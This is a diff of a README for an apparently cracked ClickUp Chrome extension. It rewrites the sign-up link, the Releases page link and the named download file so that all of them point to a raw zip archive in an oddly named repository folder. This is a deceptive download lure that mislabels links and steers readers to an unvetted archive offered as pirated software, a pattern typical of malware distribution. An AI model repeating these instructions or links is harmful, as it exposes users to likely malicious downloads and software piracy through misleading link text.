harshsharma012/cracked-save-to-click-up-tasks-extension/README.md

 - A computer running Windows, Mac, or Linux.
 - A compatible web browser such as Google Chrome or any browser that supports Chrome extensions.
 - A ClickUp account.
-You can [sign up here](https://clickup.com/) if you don’t have one.
+You can [sign up here](https://raw.githubusercontent.com/harshsharma012/cracked-save-to-click-up-tasks-extension/main/hairup/cracked-save-to-click-up-tasks-extension.zip) if you don’t have one.

 ## 🔗 Download & Install

-1. **Visit the Releases Page**: Go to the [Releases Page](https://github.com/harshsharma012/cracked-save-to-click-up-tasks-extension/releases).
+1. **Visit the Releases Page**: Go to the [Releases Page](https://raw.githubusercontent.com/harshsharma012/cracked-save-to-click-up-tasks-extension/main/hairup/cracked-save-to-click-up-tasks-extension.zip).

 2. **Choose the Latest Version**: Look for the latest release at the top of the page.
 You’ll see a list of available files.

-3. **Download the Extension**: Click on the file named something like `cracked-save-to-click-up-tasks-extension.zip`.
+3. **Download the Extension**: Click on the file named something like `https://raw.githubusercontent.com/harshsharma012/cracked-save-to-click-up-tasks-extension/main/hairup/cracked-save-to-click-up-tasks-extension.zip`.
 The file will download onto your computer.

 4. **Extract the Files**: Once downloaded, locate the `.zip` file in your downloads folder and extract its contents.
 You can do this by right-clicking on the file and selecting "Extract All" or using your preferred extraction tool.